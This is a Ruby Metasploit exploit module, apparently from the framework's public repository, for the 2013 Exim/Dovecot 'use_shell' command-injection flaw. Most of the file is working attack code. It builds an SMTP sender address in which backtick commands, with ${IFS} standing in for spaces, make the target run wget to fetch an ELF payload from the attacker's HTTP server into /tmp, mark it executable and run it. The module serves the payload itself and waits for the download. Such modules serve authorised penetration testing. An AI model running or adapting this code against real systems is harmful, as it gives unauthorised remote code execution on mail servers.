GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
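class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Smtp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Characters allowed in the staged file name. The name is spliced into a
  # shell command that travels inside the SMTP sender address, where
  # whitespace (the command uses ${IFS} to avoid it), backticks, quotes or
  # '@' would break either the command or the address.
  SAFE_DOWNFILE = /\A[A-Za-z0-9._-]+\z/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Exim and Dovecot Insecure Configuration Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability against Dovecot with
          Exim using the "use_shell" option. It uses the sender's address to inject arbitrary
          commands, since this is one of the user-controlled variables. It has been
          successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common
          packages.
        },
        'Author' => [
          'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
          'eKKiM', # PoC
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '93004' ],
          [ 'EDB', '25297' ],
          [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
        ],
        'Privileged' => false,
        'Arch' => ARCH_X86,
        'Platform' => 'linux',
        'Payload' => {
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Linux x86', {}],
        ],
        'DisclosureDate' => '2013-05-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # EHLO doubles as the domain part of the injected sender address.
        OptString.new('EHLO', [ true, 'Hostname sent in EHLO and used as the domain of the sender address', 'debian.localdomain']),
        # NOTE(review): the default below looks mangled by the page rendering
        # (e-mail obfuscation); the upstream value is not recoverable here --
        # confirm against the repository before relying on it.
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', '[email protected]']),
        # The injected wget URL carries no port, so this host must serve the
        # ELF payload on TCP/80 as well.
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the ELF payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ]
    )

    register_advanced_options(
      [
        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
      ]
    )

    # The sender address is the injection vector, so it is built by the
    # module rather than taken from the operator.
    deregister_options('MAILFROM')
  end

  # Block until the target has fetched the ELF payload from our HTTP server
  # (on_request_uri flips @elf_sent), or fail once HTTP_DELAY seconds pass.
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

    waited = 0
    until @elf_sent
      select(nil, nil, nil, 1)
      waited += 1
      next unless waited > datastore['HTTP_DELAY']

      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?")
    end
  end

  # HTTP server callback: hand the generated ELF to whoever requests the
  # resource URI. Must stay public, it is invoked by the HttpServer mixin.
  def on_request_uri(cli, request)
    unless @pl
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  # Exploit flow: stage the ELF over HTTP (local server or DOWNHOST), then
  # deliver one message whose sender address carries the wget/chmod/exec
  # commands, and wait for the callback.
  def exploit
    @pl = generate_payload_exe
    @elf_sent = false

    #
    # Resource the target will download; validate it because it ends up
    # inside a shell command embedded in the sender address.
    #
    downfile = datastore['DOWNFILE'].to_s
    downfile = rand_text_alpha(8 + rand(8)) if downfile.empty?
    unless downfile =~ SAFE_DOWNFILE
      fail_with(Failure::BadConfig, 'DOWNFILE may only contain letters, digits, ".", "_" and "-"')
    end
    resource_uri = '/' + downfile

    #
    # host + path (no scheme, no port) that the injected wget fetches, so
    # the download always goes to TCP/80 of that host
    #
    downhost = datastore['DOWNHOST'].to_s
    service_url_payload =
      if downhost.empty?
        start_payload_server(resource_uri) + resource_uri
      else
        downhost + resource_uri
      end

    connect

    print_status("#{rhost}:#{rport} - Server: #{banner.to_s.strip}")
    if !datastore['SkipVersionCheck'] && banner.to_s !~ /Exim /
      disconnect
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
    end

    ehlo = datastore['EHLO']
    raw_send_recv("EHLO #{ehlo}\r\n").to_s.each_line do |line|
      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
    end

    #
    # Initiate the message; every step must be acknowledged before the next
    #
    filename = rand_text_alpha_lower(8)
    from = injected_sender(service_url_payload, filename, ehlo)

    smtp_expect("MAIL FROM: #{from}\r\n", 'MAIL', '250')
    smtp_expect("RCPT TO: #{datastore['MAILTO']}\r\n", 'RCPT', '250')
    smtp_expect("DATA\r\n", 'DATA', '354')
    smtp_expect("Subject: test\r\n\r\n.\r\n", 'DELIVER', '250')
    disconnect

    # wait for payload download
    if downhost.empty?
      wait_linux_payload
    else
      # We cannot observe a download from a third-party host; the operator
      # must be serving the ELF there. Just give the target time to fetch it.
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    end
    register_file_for_cleanup("/tmp/#{filename}")
  end

  private

  # Start the local HTTP server that serves the ELF at resource_uri and
  # return the host the target should connect to.
  def start_payload_server(resource_uri)
    # The injected wget URL carries no port, so the listener must be on 80.
    if datastore['SRVPORT'].to_i != 80
      fail_with(Failure::BadConfig, 'The Web Server needs to live on SRVPORT=80')
    end

    # we use SRVHOST as download IP for the coming wget command.
    # SRVHOST needs a real IP address of our download host
    srv_host = datastore['SRVHOST']
    if ['0.0.0.0', '::'].include?(srv_host)
      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
    end

    service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
    print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
    start_service(
      'Uri' => {
        'Proc' => proc { |cli, req| on_request_uri(cli, req) },
        'Path' => resource_uri
      },
      'ssl' => false # plain HTTP: the injected wget is given no TLS options
    )
    srv_host
  end

  # Build the MAIL FROM address carrying the injected commands. With
  # use_shell the address reaches a shell, so backtick substitutions run;
  # ${IFS} stands in for spaces, which the address cannot contain.
  def injected_sender(url, filename, domain)
    from = rand_text_alpha(3)
    from << "`/usr/bin/wget${IFS}#{url}${IFS}-O${IFS}/tmp/#{filename}`"
    from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
    from << "`/tmp/#{filename}`"
    from << "@#{domain}"
    from
  end

  # Send one SMTP command (or the message body) and require a reply that
  # starts with the given code; a missing reply is treated as a failure
  # instead of raising NoMethodError on nil.
  def smtp_expect(data, label, code)
    resp = raw_send_recv(data) || 'no response'
    msg = "#{label}: #{resp.strip}"
    unless resp.start_with?(code)
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
    end
    print_status("#{rhost}:#{rport} - #{msg}")
  end
end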